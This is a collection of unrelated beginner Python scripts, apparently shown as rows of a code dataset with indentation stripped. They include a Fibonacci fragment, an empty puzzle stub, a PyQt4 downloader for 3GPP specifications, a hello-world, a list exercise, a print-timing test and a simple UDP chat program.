for (i, j) in generate_fibonacci():
if len(str(j)) == 1000:
print('%d: %d' % (i,j))
break
if __name__ == '__main__':
main() |
#!/usr/local/bin/python
from unittest import TestCase
def answer_one():
with open('2020_07_input.txt', 'r') as f:
line = f.readline()
while line:
line = f.readline()
def answer_two():
with open('2020_07_input.txt', 'r') as f:
line = f.readline()
while line:
line = f.readline()
pass
if __name__ == '__main__':
print(answer_one())
# print(answer_two())
|
#coding:utf-8
from PyQt4.QtGui import *
from PyQt4.QtCore import *
import urllib,re,sys
doc_version=['11.9.0','11.8.0','11.7.0','11.6.0','11.5.0','11.4.0','11.3.0','11.2.0','11.1.0']
baseurl='http://www.3gpp.org/ftp/Specs/html-info/%s.htm'
class StandardDialog(QDialog):
def __init__(self,parent=None):
super(StandardDialog,self).__init__(parent)
self.setWindowTitle("3GPP doc Downloader!")
DimMsgDecodeButton=QPushButton(self.tr("Dim Msg Decode"))
self.label_SrcBuf = QLabel('3GPP DocID: 29273 29280 ...')
self.fileTextEditInput=QTextEdit()
self.fileTextEditOutput=QTextEdit()
self.fileTextEditOutput.setReadOnly(1)
layout=QGridLayout()
#col 0
layout.addWidget(self.label_SrcBuf, 0, 0)
layout.addWidget(self.fileTextEditInput, 1, 0, 3, 1)
layout.addWidget(self.fileTextEditOutput,4,0, 12, 1)
#col 1
layout.addWidget(DimMsgDecodeButton,2,1)
self.setLayout(layout)
self.connect(DimMsgDecodeButton,SIGNAL("clicked()"),self.DecodeDimMsgSlot)
def getdoc(self,doc_no):
url=baseurl%(doc_no)
log='preparing download from'+url
self.fileTextEditOutput.append(log)
try:
webpage=urllib.urlopen(url).read()
for ver in doc_version:
doc_urls=re.findall('<a href=(.*?)>'+ver, webpage)
if doc_urls:
doc_url=doc_urls[0]
break
filename1=re.search('\d{5}-b\d{2}.zip',doc_url)
if filename1:
filename=filename1.group()
else:
filename=doc_no
s=urllib.urlopen(doc_url)
destfile=s.read()
open(filename,'wb').write(destfile)
log='download %s from %s success!!'%(filename, doc_url)
self.fileTextEditOutput.append(log)
except:
log='open url ['+url+'] failure!'
self.fileTextEditOutput.append(log)
def DecodeDimMsgSlot(self):
hexstr=str(self.fileTextEditInput.toPlainText()).strip()
downloadlist=re.split('[ ,]',hexstr)
print downloadlist
for docid in downloadlist:
self.getdoc(docid)
if __name__ == '__main__':
print 'starting!!!'
app=QApplication(sys.argv)
form=StandardDialog()
form.show()
app.exec_() |
# -*- coding: utf-8 -*-
"""
Created on Thu May 16 12:52:29 2019
@author: walonsor
"""
import sys #para importar librerias del sistemas
print("Hola, bienvenido a tu primer script")
print(sys.argv) #esto lo que hace es mostrar los parametros q se reciben ejemplo: ['1_HolaMundo.py', 'Una cadena de texto', '5']
|
# Author: Azad
# Date: 4/5/18
# Desc: Write a program that takes a list of numbers
# (for example, a = [5, 10, 15, 20, 25])
# and makes a new list of only the first and last elements of the given list.
# For practice, write this code inside a function.
#________________________________________________________________________________________
a = [5, 10, 15, 20, 25]
def get_start_and_end(list):
return [list[0], list[len(list)-1]]
print(get_start_and_end(a))
|
# -*- coding: cp949 -*-
import time
l = range(1000)
t = time.mktime(time.localtime())
for i in l:
print(i,)
t1 = time.mktime(time.localtime()) - t
t = time.mktime(time.localtime())
print(", ".join(str(i) for i in l))
t2 = time.mktime(time.localtime()) - t
print("for 문으로 각 인자를 출력")
print("Take {0} seconds".format(t1))
print("join() 메서드로 출력")
print("Take {0} seconds".format(t2))
|
from socket import*
from threading import Thread
def main():
global udp_socket
global dest_ip
global dest_port
dest_ip = input("ip:")
dest_port = int(input("port:"))
udp_socket = socket(AF_INET, SOCK_DGRAM)
bind_addr = ('10.123.164.100', 8000)
udp_socket.bind(bind_addr)
recieve = Thread(target=accept)
send_msg = Thread(target=send)
recieve.start()
send_msg.run()
recieve.join()
send_msg.join()
udp_socket.close()
def accept():
while True:
accept_data, dest_addr = udp_socket.recvfrom(1024)
print(format_str(str(accept_data)))
def send():
while True:
send_data = input("<<")
dest_addr = (dest_ip, dest_port)
udp_socket.sendto(send_data.encode(encoding='utf-8'), dest_addr)
def format_str(string):
size = len(string)
import re
str = re.findall(r'[^b]', string)
new_str = str[1:(len(str)-5)]
s = ''
for i in range(len(new_str)):
s += new_str[i]
return s
if __name__ == '__main__':
main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.